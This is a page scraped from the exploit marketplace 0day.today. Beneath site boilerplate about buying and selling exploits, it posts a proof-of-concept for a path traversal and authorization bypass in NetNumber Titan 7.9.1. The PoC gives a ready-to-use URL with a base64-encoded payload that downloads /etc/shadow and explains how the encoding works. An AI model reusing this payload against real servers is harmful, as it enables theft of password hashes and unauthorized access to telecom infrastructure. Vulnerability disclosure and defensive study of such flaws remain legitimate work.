0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass Vulnerabilities
# Exploit Title: NetNumber Titan ENUM/DNS/NP - Path Traversal - Authorization Bypass # Exploit Author: MobileNetworkSecurity # Vendor Homepage: https://www.netnumber.com/products/#data # Software Link: N/A # Version: Titan Master 7.9.1 # Tested on: Linux # CVE : N/A # Type: WEBAPP ************************************************************************* A Path Traversal issue was discovered in the Web GUI of NetNumber Titan 7.9.1. When an authenticated user attempts to download a trace file (through drp) by using a ../../ technique, arbitrary files can be downloaded from the server. Since the webserver running with elevated privileges it is possible to download arbitrary files. The HTTP request can be executed by any (even low privileged) user, so the authorization mechanism can be bypassed. ************************************************************************* Proof of Concept (PoC): http://X.X.X.X/drp?download=true&path=Ly9TWVNURU0vc3lzdGVtL3RyYWNlP2Rvd25sb2FkPXQmZWw9Li4vLi4vLi4vLi4vZXRjL3NoYWRvdw$$ The vulnerable path parameter is base64 encoded where the equal sign replaced by the dollar sign. Original payload: Ly9TWVNURU0vc3lzdGVtL3RyYWNlP2Rvd25sb2FkPXQmZWw9Li4vLi4vLi4vLi4vZXRjL3NoYWRvdw$$ Replaced dollar signs: Ly9TWVNURU0vc3lzdGVtL3RyYWNlP2Rvd25sb2FkPXQmZWw9Li4vLi4vLi4vLi4vZXRjL3NoYWRvdw== Base64 decoded payload: //SYSTEM/system/trace?download=t&el=../../../../etc/shadow In the HTTP response you will receive the content of the file. ************************************************************************* The issue has been fixed in the newer version of the software. # 0day.today [2024-11-04] #